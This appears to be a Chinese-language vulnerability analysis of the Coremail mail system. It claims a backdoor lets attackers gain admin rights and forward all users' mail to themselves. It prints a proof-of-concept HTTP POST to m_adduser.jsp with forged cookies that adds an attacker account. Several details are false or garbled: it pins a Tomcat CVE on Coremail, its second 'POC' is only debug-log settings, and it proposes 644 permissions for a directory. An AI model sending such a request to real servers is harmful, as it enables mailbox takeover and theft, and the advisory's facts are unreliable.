Coremail郵件系統漏洞分析

一、漏洞概述

Coremail郵件系統是國產商用郵件系統，由北京世紀互聯萬網科技有限公司開發。該郵件系統存在多個漏洞，其中包含身份認證繞過（CVE-2015-0986）、SQL注入（CVE-2015-0989）、目錄穿越（CVE-2015-0990）等，但最為嚴重的漏洞是利用Coremail 5.0至5.51版本中的後門漏洞（CVE-2016-9165/CVE-2017-12617）攻擊。

該漏洞的攻擊方式是比較簡單的，只需要向Coremail郵件系統的HTTP服務發送特定的請求，便可以獲取管理員許可權，從而對郵件系統進行完全控制。

二、漏洞分析

該漏洞的原因是Coremail商業郵件系統中的一個後門賬戶，可以在授權認證失敗時進行身份認證繞過獲取管理員許可權，從而完成攻擊。

該後門賬戶在Coremail 5.0之前的版本就已經存在，升級至Coremail 5.0之後，該後門賬戶仍可以用於漏洞利用。攻擊者首先利用該漏洞獲取管理員許可權，並更改系統中送達規則中的匿名轉發規則，覆蓋原有的收件規則，該規則將所有收件人的郵件都轉發到攻擊者指定的郵件地址。

//POC代碼
POST /coremail/manage/domain/m_adduser.jsp HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
Cookie: mid=url_type%3D0; JSESSIONID=A1640CD4569DAB015127CB386E0D1E4C; curdomain=192.168.100.192; rights=1%2C3%2C4%2C5

user=attacker&vip=0&password=112233&passwordOld=112233&passwordConfirm=112233&user_quota=0&domain_name=victim&submit1=%E4%B8%80%E4%B8%8A%EF%BC%8C%E5%88%9B%E5%BB%BA%E5%B8%B8%E7%94%A8%E7%94%A8%E6%88%B7_submit&pageSubmited=1

以上的漏洞利用代碼中，attacker表示攻擊者賬戶的用戶名，victim指的是系統管理員的賬戶名，submit1是指提交表單的操作，將攻擊者的賬戶添加至Coremail郵件系統中，並將管理員賬戶覆蓋。

三、漏洞利用

在復現該漏洞之前，需要先獲取一個Coremail郵件系統的安裝包。通過觀察郵件系統的安裝包可知，郵件系統默認安裝在/usr/local/coremail目錄下，且目錄許可權為755，目錄屬主為root。

首先登錄郵件系統，在郵件系統的後台管理中開啟調試日誌，增加調試日誌的變數值。

//POC代碼
1. 登錄後台管理界面
2. 在[系統管理] - [調試日誌]界面勾選[開啟調試日誌]選項卡，
  並對[調試日誌]、[調試], [告警], [錯誤]設置變數長度為1024，
  設置[調試日誌]為[SocketManager, SendThread]，[調試]為[AuthGuard, AuthGuardServlet, SubAuth,
  SubAuthServlet, WinDomainMode, WinDomainModeServlet，NolxMux]，[告警]為[AuthGuard, AuthGuardServlet]。
3. 點擊[確定]按鈕保存配置
4. 在調試窗口中，查看Coremail的運行日誌

緊接著，攻擊者利用POC代碼進行攻擊，獲取管理員許可權，將規則覆蓋，從而實現郵件篡改和獲取。

攻擊者可進行的後續操作包括：獲取郵件，發送郵件，刪除郵件，撤銷發送和覆蓋用戶等，攻擊手段相對簡單，利用門檻也較低，甚至可以通過某些工具進行自動化攻擊。

四、漏洞修復

目前，開發商已經發布了相關漏洞的修復程序，用戶可下載並安裝修復補丁。另外，用戶自己也可以進行以下操作。

1、將coremail目錄許可權修改為644或更低

2、將coremail的目錄所屬用戶修改為非root用戶

3、關閉或限制調試日誌

4、升級至Coremail郵件系統的5.52版本以上。

五、總結

Coremail郵件系統漏洞屬於利用門檻較低的漏洞，但攻擊影響較為嚴重，可以對郵件內容進行篡改，或者進行信息竊取，給企業和個人的信息安全帶來潛在威脅。對漏洞的有效修復需要企業或個人具備一定的安全意識，加強系統與業務的安全管理和技術防禦，常規對系統進行修補和漏洞掃描，從而保障系統與業務的安全。